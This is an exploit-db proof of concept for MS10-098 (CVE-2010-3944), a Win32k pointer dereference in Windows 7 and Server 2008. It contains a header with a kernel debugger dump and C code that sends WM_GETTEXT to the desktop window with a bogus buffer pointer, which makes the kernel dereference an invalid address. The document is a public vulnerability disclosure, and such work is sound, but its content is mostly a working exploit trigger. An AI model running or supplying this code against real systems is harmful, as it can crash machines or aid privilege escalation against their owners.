Microsoft Windows – Win32k Pointer Dereferencement (PoC) (MS10-098)

  • Author: Stefan LE BERRE
    Date: 2010-12-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15758/
    /*************************************************************************************
     * MS10-098
     * CVE-2010-3944
     *
     * Microsoft Windows Win32k pointer dereferencement
     *
     * --------------------
     * Affected Software
     * --------------------
     * Microsoft Windows 7 / 2008
     *
     *
     * --------------------
     * Consequences
     * --------------------
     * An unprivileged user may be able to cause a bugcheck, or possibly execute
     * arbitrary code by CSRSS.EXE.
     *
     *
     *
     * Credits : Stefan LE BERRE (s.leberre@sysdream.com)
     *           Ludo t0ka7a
     *
     * WebSites : http://www.sysdream.com/
     *            http://ghostsinthestack.org/
     *            http://infond.blogspot.com/
     *            http://twitter.com/hackinparis
     *
     * kd> r
     * eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
     * eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
     * cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
     * win32k!xxxRealDefWindowProc+0xf6:
     * 8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??
     *
     *************************************************************************************/

    #include <stdio.h>
    #include <windows.h>
    #include <Winuser.h>


    int main(int argc, char *argv[])
    {
        /* Message 13 is WM_GETTEXT; the huge wParam (buffer length) and the bogus
         * lParam buffer pointer 0x13370 are what win32k dereferences in kernel mode.
         * 16 is the window handle of the #32769 (desktop) window on the author's system. */
        SendMessage((HWND) 16, (UINT) 13, 0x80000000, 0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
        return 0;
    }